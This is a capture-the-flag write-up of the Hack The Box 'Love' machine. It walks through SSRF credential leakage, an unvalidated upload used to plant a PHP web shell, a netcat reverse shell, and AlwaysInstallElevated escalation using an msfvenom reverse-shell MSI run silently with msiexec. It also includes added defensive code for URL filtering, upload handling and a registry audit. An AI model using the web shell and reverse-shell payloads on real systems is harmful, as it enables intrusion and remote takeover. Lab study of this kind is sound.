Hack The Box: Love
This was a wonderful practice lab with many paths to user and a cool trick for root. We started off with an overwhelming number of ports and services and decided to focus on the web application. We found an alternative hostname in the SSL certificate and used /etc/hosts to bypass DNS and reach a second domain hosting a file scanning tool; pointing that scanner at the host's own port 5000 service returned credentials. With these we logged in through the admin page of the other domain and found a file upload that did not validate its input, allowing remote code execution. Rather than executing code directly, I deployed a web shell, which opened the door to pushing up netcat and executing it for a reverse shell. From there I dropped winPEAS as usual; the output took hours and hours to go through until eventually the AlwaysInstallElevated setting was noted, which allowed for a backdoor packaged as a .msi.
host name mapping for DNS bypass - /etc/hosts
Netcat reverse shell
Privilege escalation via AlwaysInstallElevated
nc.exe (not nc64.exe as this errored out)
As always we start off with a basic nmap scan, and because this machine blocks ping probes we use -Pn to skip host discovery. There is a rather large number of open ports and services that will require enumeration, so I wanted to dive a little deeper before forming a plan to tackle them.
Using the nmap default scripts (-sC) and version detection (-sV) I am able to extract some more information from each of the services.
└─$ nmap 10.129.48.103 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 18:17 EDT
Nmap scan report for staging.love.htb (10.129.48.103)
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Secure file scanner
135/tcp  open  tcpwrapped
139/tcp  open  tcpwrapped
443/tcp  open  tcpwrapped
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  tcpwrapped Windows 10 Pro 19042 tcpwrapped
3306/tcp open  tcpwrapped
5000/tcp open  tcpwrapped

Host script results:
|_clock-skew: mean: 2h41m02s, deviation: 4h02m32s, median: 21m00s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-29T15:39:15-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-08-29T22:39:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.81 seconds
We learned several things from this scan:
Our Apache server has a file scanning service on port 80
We have a Windows machine running the Apache web platform, as per the HTTP server header
Alternative lookup name staging.love.htb, as per the SSL certificate
Checking for open permissions on the SMB file share returned an access denied message.
Enumeration HTTP 10.129.48.103
We initially find a voting system login page, and some basic credential attempts do not provide any access. From here I launched OWASP DirBuster to look for hidden directories.
We have a seemingly endless list of directories populating, but there are several which require our initial attention. These include the admin-related pages and the admin home and login PHP scripts. Of course we have to be mindful of the /images/ folder, as this could be indicative of a file upload form somewhere which we can possibly abuse.
Recalling the suggested FQDN name on the SSL cert, we will update our host mappings to bypass the DNS server for name address resolving. We will do this with the /etc/hosts file as seen in the image below.
Browsing to staging.love.htb renders the scanner page that was mentioned in our initial scan over port 80.
Looking around the page quickly shows the file scanner referenced in the initial scan; it can be accessed from the Demo button at the top of the landing page.
With this many services and ports open, it is common for some of them to accept connections only from the host itself. Since the file scanner retrieves whatever it is pointed at from the server's own network position, we can use it to check those ports from an internal perspective. Eventually port 5000 just flat out returns credentials :)
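The scanner's weakness is that it fetches a user-supplied URL from the server's own network position, so loopback-only services such as port 5000 become reachable. The following is an added example (not the Love box's scanner code, and not from the original write-up) of the destination check a server-side fetcher should perform before connecting; the function names, the allowed-scheme set and the test addresses are my own assumptions:

```python
"""Destination filter for a server-side URL fetcher.

Added example, not the Love box's scanner code.  The scanner on the
staging host retrieves whatever it is pointed at, from the server's own
network position, which is how loopback-only services become reachable.
A fetcher that must exist should refuse loopback, private, link-local
and otherwise non-public destinations, and it has to decide AFTER
resolving the host name, because the name is what the user controls.
"""
import ipaddress
import socket
from ipaddress import IPv4Address, IPv6Address
from typing import List, Union
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: the scanner only needs web URLs
Address = Union[IPv4Address, IPv6Address]


def resolve_all(host: str) -> List[Address]:
    """Every address the host currently resolves to; IP literals pass through.
    Resolving (rather than string-matching the name) also covers the
    alternative spellings the system resolver is willing to accept."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def is_public_address(addr: Address) -> bool:
    """Only globally routable unicast destinations are acceptable."""
    mapped = getattr(addr, "ipv4_mapped", None)   # ::ffff:127.0.0.1 -> 127.0.0.1
    if mapped is not None:
        addr = mapped
    return not (
        addr.is_loopback
        or addr.is_private
        or addr.is_link_local
        or addr.is_multicast
        or addr.is_reserved
        or addr.is_unspecified
    )


def is_safe_scan_target(url: str) -> bool:
    """True only when the scheme is http(s), a host is present, and every
    address the host resolves to is public.  Resolution failure is unsafe."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addrs = resolve_all(parts.hostname)
    except (socket.gaierror, ValueError, UnicodeError):
        return False
    return bool(addrs) and all(is_public_address(a) for a in addrs)
```

The check is only as good as the address the fetch actually connects to: a name can resolve differently between the check and the connection, so the fetcher should connect to the address it validated (or route all outbound requests through an egress proxy that applies the same policy) rather than re-resolving the name.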
Taking those credentials we jump over to the voting system landing page that we found earlier, where the default credentials had been unsuccessful.
Oddly enough these credentials did not work and I was quite confused as it seemed like the intended path.
After retracing my steps I remembered we had a particular directory for admins, and browsing to it presented the same class of login form under the admin directory. Here the credentials worked and we moved on to the next phase of our engagement.
This was our landing page and I immediately started looking around for vulnerabilities.
There are several spots where we can upload files, so without delay we get started. Eventually I land on the profile update page, where we can upload an image to our profile. From here I uploaded a PHP web shell.
└─$ cat cmd.php
<?php echo shell_exec($_GET['cmd']); ?>
From here we upload this simple shell and are now able to pass commands through the cmd GET parameter (the parameter name is assumed; the listing as originally posted passed the whole $_GET array to shell_exec, which does not work). You can URL-encode the commands if you want, but no worries, as they will be automatically encoded for you.
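The root cause here is a profile-image upload that keeps the client's file name and extension and writes it somewhere Apache serves, so a .php file is executed on the next request. The following is an added example, not the voting system's own code and not from the original write-up, showing that unvalidated pattern beside a hardened version; the function names, the allowed image types and the size cap are my own assumptions:

```python
"""Profile-image upload: the unvalidated pattern beside a hardened one.

Added example, not the voting system's own code.  store_unsafe mirrors
what the write-up exploits: the server keeps the client-supplied file
name, so cmd.php lands in a web-served folder and Apache executes it.
store_safe decides the type from the bytes, consults the client name only
to confirm it agrees, and stores under a server-chosen name.
"""
import secrets
from pathlib import Path
from typing import Optional

# Leading bytes of the image types a profile picture is allowed to be (assumption).
_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def store_unsafe(upload_dir: str, client_name: str, data: bytes) -> str:
    """Vulnerable: trusts the client's file name and extension as-is.
    'cmd.php' becomes upload_dir/cmd.php; if upload_dir is under the
    document root, the web server will run it on the next request."""
    dest = Path(upload_dir) / client_name
    dest.write_bytes(data)
    return str(dest)


def detect_image_type(data: bytes) -> Optional[str]:
    """'jpg', 'png' or 'gif' from the file's signature bytes, else None."""
    for kind, signatures in _MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def store_safe(upload_dir: str, client_name: str, data: bytes,
               max_bytes: int = 2 * 1024 * 1024) -> str:
    """Hardened upload: size cap, content-based type check, random name.

    The client name is consulted only to verify that its extension
    matches what the bytes say; it never influences the stored path, so
    cmd.php, ../cmd.php and shell.php.jpg cannot create a script file.
    """
    if len(data) > max_bytes:
        raise ValueError("file too large")
    kind = detect_image_type(data)
    if kind is None:
        raise ValueError("not a supported image type")
    claimed = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if claimed == "jpeg":
        claimed = "jpg"
    if claimed != kind:
        raise ValueError("extension does not match file content")
    # Server-chosen name: 32 hex characters plus the extension we determined.
    dest = Path(upload_dir) / f"{secrets.token_hex(16)}.{kind}"
    dest.write_bytes(data)
    return str(dest)
```

Even with store_safe, the upload directory should live outside the document root or have script execution disabled for it, so that an image file carrying embedded PHP (a valid JPEG is still a valid JPEG with PHP in a comment block) can never be reached through an interpreter.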
Great, we have command execution, so the next step is to gain interactive access using a remote binary like nc for Windows. We upload it just like the cmd web shell.
We check the current directory and see our desired binaries.
Let's set up a listener and execute a reverse shell back to port 4444.
There we have it!
I uploaded and executed winPEAS. There was a ton of output to go through until I eventually came across "AlwaysInstallElevated", which sadly I only noticed on my second review of the winPEAS results, mainly because winPEAS tends to be information overload and it is easy to fixate on just a few things.
So from here I did some research and learned it is literally as simple as it sounds: we create an installer package and it will run as root. Thankfully msfvenom can create .msi and .exe packages for us.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=9001 -f msi -o shell.msi
From here I uploaded my shell.msi and ran it with:
msiexec /quiet /qn /i shell.msi
/quiet - install without prompting the user
/qn - no user interface at all (another silent-install switch)
/i - install the given package
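Because winPEAS reports the two registry hives separately, it is worth knowing that the policy only takes effect when AlwaysInstallElevated is set to 1 under both HKLM and HKCU. The following is an added example (not winPEAS output and not from the original write-up) of an audit that applies that rule, either live on the Windows host or over captured reg query output; the function names and the sample outputs are constructed assumptions:

```python
"""AlwaysInstallElevated audit.

Added example; this is not winPEAS output and not the box's own code.
Windows Installer only honours the policy when the AlwaysInstallElevated
DWORD is 1 under BOTH the machine (HKLM) and user (HKCU) policy key, so
a finding for one hive alone is not yet a privilege escalation.  On the
host itself the script reads the registry; elsewhere (review of collected
evidence) the same logic runs over captured `reg query` output.
"""
import re
import sys
from typing import Dict, Optional

POLICY_PATH = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

# Matches the value line of `reg query <hive>\<POLICY_PATH> /v AlwaysInstallElevated`:
#     AlwaysInstallElevated    REG_DWORD    0x1
_REG_LINE = re.compile(
    r"^\s*" + re.escape(VALUE_NAME) + r"\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$",
    re.MULTILINE,
)

# Constructed sample outputs (not captured from the Love box).
SAMPLE_HKLM_SET = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
SAMPLE_HKCU_SET = SAMPLE_HKLM_SET.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\r\n"


def parse_reg_query(output: str) -> Optional[int]:
    """DWORD from reg query output, or None when the value or key is absent."""
    match = _REG_LINE.search(output)
    return int(match.group(1), 16) if match else None


def is_exploitable(hklm: Optional[int], hkcu: Optional[int]) -> bool:
    """The policy is in force only when both hives hold exactly 1."""
    return hklm == 1 and hkcu == 1


def assess(hklm_output: str, hkcu_output: str) -> Dict[str, object]:
    """Combine the two captured outputs into one finding."""
    hklm = parse_reg_query(hklm_output)
    hkcu = parse_reg_query(hkcu_output)
    return {"hklm": hklm, "hkcu": hkcu, "exploitable": is_exploitable(hklm, hkcu)}


def read_live_value(hive) -> Optional[int]:
    """Read the DWORD from one hive on the local Windows host (winreg is
    Windows-only, hence the local import)."""
    import winreg
    try:
        with winreg.OpenKey(hive, POLICY_PATH) as key:
            value, _kind = winreg.QueryValueEx(key, VALUE_NAME)
            return int(value)
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("Not on Windows: feed captured reg query output to assess() instead")
    import winreg
    hklm = read_live_value(winreg.HKEY_LOCAL_MACHINE)
    hkcu = read_live_value(winreg.HKEY_CURRENT_USER)
    print({"hklm": hklm, "hkcu": hkcu, "exploitable": is_exploitable(hklm, hkcu)})
```

When the audit reports exploitable, the fix is to set the "Always install with elevated privileges" policy to Disabled under both Computer Configuration and User Configuration (Administrative Templates > Windows Components > Windows Installer), which clears the value in both hives; a quiet msiexec install by a non-administrator, as in the write-up, is then just a failed install worth alerting on.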
With a listener we get a root shell :)